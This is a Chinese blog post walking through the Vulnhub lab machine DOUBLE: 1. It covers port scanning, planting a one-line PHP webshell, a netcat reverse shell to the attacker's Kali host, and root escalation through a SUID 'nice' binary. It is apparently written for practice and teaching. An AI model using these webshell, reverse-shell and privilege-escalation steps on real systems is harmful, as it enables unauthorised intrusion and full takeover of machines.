首页 > 其他分享 >Vulnhub: DOUBLE: 1靶机

Vulnhub: DOUBLE: 1靶机

时间:2023-08-22 16:48:24浏览次数:48  
标签:bin http 111.209 DOUBLE 192.168 Vulnhub 靶机 sendcommand out

kali:192.168.111.111

靶机:192.168.111.209

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.209

image

目标80端口

image

image

sendcommand.php页面源码

image

写入webshell

<?php system($_GET["cmd"]);?>

image

执行命令

http://192.168.111.209/production/sendcommand.php?out=out&cmd=id

image

获得反弹shell

http://192.168.111.209/production/sendcommand.php?out=out&cmd=nc -e /bin/bash 192.168.111.111 4444

image

提权

查找suid权限的文件

find / -perm -u=s -exec ls -al {} \; 2> /dev/null

image

提权方法:https://gtfobins.github.io/gtfobins/nice/#suid

image

提升为root

/usr/bin/nice /bin/bash -p

image

标签:bin,http,111.209,DOUBLE,192.168,Vulnhub,靶机,sendcommand,out
From: https://www.cnblogs.com/ctostm/p/17648917.html

相关文章

  • 0×03 Vulnhub 靶机渗透总结之 KIOPTRIX: LEVEL 1.2 (#3) SQL注入+sudo提权
    0×03Vulnhub靶机渗透总结之KIOPTRIX:LEVEL1.2(#3)......
  • Vulnhub: ICMP: 1靶机
    kali:192.168.111.111靶机:192.168.111.208信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.20880端口的cms为Monitorr1.7.6m搜索发现该版本的cms存在远程代码执行searchsploitmonitorr漏洞利用nc本地监听,再执行exppython348980.pyh......
  • 【渗透测试】 Vulnhub JANGOW: 1.0.1
    渗透环境攻击机:   IP: 192.168.149.128(Kali)靶机:     IP:192.168.149.129靶机下载地址:https://www.vulnhub.com/entry/jangow-101,754/进行渗透一、获取IP及端口信息使用nmap扫描同网段IP,如果使用的是VMware可能出现扫描不到的情况,需要在靶机的恢复模式里......
  • Vulnhub: DriftingBlues: 2靶机
    kali:192.168.111.111靶机:192.168.111.207信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.20780端口的/blog目录为wordpresswpscan收集wordpress用户和爆破密码wpscan--urlhttp://driftingblues.box/blog-eu,ap--plugins-detectionmi......
  • 靶机 red hat enterprise linux 从收集到提权
    前言:时间2022年5月22日,在B/S架构上通过用户名dus2进行密码爆破后得到了dus2,拿到了普通用户的shell(权限很低),最终目的拿到root的shell来破环整个服务器。linux提权思路归纳   首先开始信息收集,登陆普通用户dsu2       uname-a                    ......
  • 5.2 复式记账法总体流程 Double Entry Accounting
    1.日记账GeneralJournal账簿格式日期、分类账户、增加金额(借方)、减少金额(贷方)日记账像一个银行流水单,它按时间顺序清晰的记录了一个企业在某个时间段所发生的所有商业交易。如下图:2.把日记账内容记录到分类账户LedgerAcount分类账簿格式:分类账户名称、日期(增)、账户(......
  • DC-9靶机
    靶机下载地址:http://www.five86.com/downloads/DC-9.zip1.查看kali靶机ip2.nmap192.168.137.0/24     nmap扫描同一网络段的靶机ip地址3.访问靶机192.168.137.154   访问80端口4.查看网站内容信息,在DisplayallRecords里有一些用户信息第三个Search,搜索拿......
  • decimal float double小数位比较
    decimalfloatdouble小数位比较语法---2023-7-27decimal最多可以保留28位小数float最多可以保留6位小数double最多可以保留14位小数///<summary>///测试语法///</summary>publicstaticvoidTestProgrammer(){d......
  • 【Vulnhub】OSCP
    靶场介绍靶场下载地址:https://www.vulnhub.com/entry/infosec-prep-oscp,508/靶场难度:容易kali:192.168.11.5靶机:192.168.11.13信息收集使用nmap扫描靶机开放的端口及服务nmap-A-T4-sS192.168.11.13可以看到靶机开启了22和80端口使用dirb扫描一下目录扫出来一个r......
  • Vulnhub: MoneyBox: 1靶机
    kali:192.168.111.111靶机:192.168.111.194信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.194ftp匿名登录发现trytofind.jpg目录爆破发现blogs目录gobusterdir-uhttp://192.168.111.194-w/usr/share/wordlists/dirbuster/directory-li......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99